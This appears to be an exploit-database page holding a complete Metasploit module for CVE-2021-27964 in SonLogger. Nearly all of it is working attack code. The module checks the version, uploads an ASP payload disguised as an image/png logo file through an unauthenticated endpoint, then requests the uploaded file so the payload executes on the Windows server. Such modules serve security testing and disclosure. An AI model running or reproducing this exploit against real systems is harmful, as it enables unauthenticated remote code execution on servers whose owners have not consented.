toggle-mode

SonLogger 4.2.3.3 - Unauthenticated Arbitrary File Upload (Metasploit)

Berkan Er

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::EXE
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SonLogger Arbitrary File Upload Exploit',
        'Description' => %q{
          This module exploits an unauthenticated arbitrary file upload
          via insecure POST request. It has been tested on version < 6.4.1 in
          Windows 10 Enterprise.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module
          ],
        'References' =>
          [
            ['CVE', '2021-27964'],
            ['URL', 'https://erberkan.github.io/2021/SonLogger-vulns/']
          ],

        'Platform' => ['win'],
        'Privileged' => false,
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' =>
          [
            [
              'SonLogger < 6.4.1',
              {
                'Platform' => 'win'
              }
            ],
          ],
        'DisclosureDate' => '2021-03-01',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        Opt::RPORT(5000),
        OptString.new('TARGETURI', [true, 'The base path to the SonLogger', '/'])
      ]
    )
  end

  def check_product_info
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'),
      'method' => 'POST',
      'data' => '',
      'headers' => {
        'Accept' => 'application/json, text/javascript, */*; q=0.01',
        'Accept-Language' => 'en-US,en;q=0.5',
        'Accept-Encoding' => 'gzip, deflate',
        'X-Requested-With' => 'XMLHttpRequest'
      }
    )
  end

  def check
    begin
      res = check_product_info

      unless res
        return CheckCode::Unknown('Target is unreachable.')
      end

      unless res.code == 200
        return CheckCode::Unknown("Unexpected server response: #{res.code}")
      end

      version = Gem::Version.new(JSON.parse(res.body)['Version'])

      if version < Gem::Version.new('6.4.1')
        CheckCode::Vulnerable("SonLogger version #{version}")
      else
        CheckCode::Safe("SonLogger version #{version}")
      end
    rescue JSON::ParserError
      fail_with(Failure::UnexpectedReply, 'The target may have been updated')
    end
  end

  def create_payload
    Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s
  end

  def exploit
    begin
      print_good('Generate Payload')
      data = create_payload

      boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(5..14))}"
      post_data = "--#{boundary}\r\n"
      post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(rand(5..11))}.asp\"\r\n"
      post_data << "Content-Type: image/png\r\n"
      post_data << "\r\n#{data}\r\n"
      post_data << "--#{boundary}\r\n"

      res = send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'),
        'ctype' => "multipart/form-data; boundary=#{boundary}",
        'data' => post_data,
        'headers' => {
          'Accept' => 'application/json',
          'Accept-Language' => 'en-US,en;q=0.5',
          'X-Requested-With' => 'XMLHttpRequest'
        }
      )
      unless res
        fail_with(Failure::Unreachable, 'No response from server')
      end

      unless res.code == 200
        fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
      end

      json_res = begin
        JSON.parse(res.body)
      rescue JSON::ParserError
        nil
      end

      if json_res.nil? || json_res['Message'] == 'Error in saving file'
        fail_with(Failure::UnexpectedReply, 'Error uploading payload')
      end

      print_good('Payload has been uploaded')

      handler

      print_status('Executing payload...')
      send_request_cgi({
        'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),
        'method' => 'GET'
      }, 5)
    end
  rescue StandardError
    fail_with(Failure::UnexpectedReply, 'Failed to execute the payload')
  end
end

date: 2021-03-15, platform: webapps, type: multiple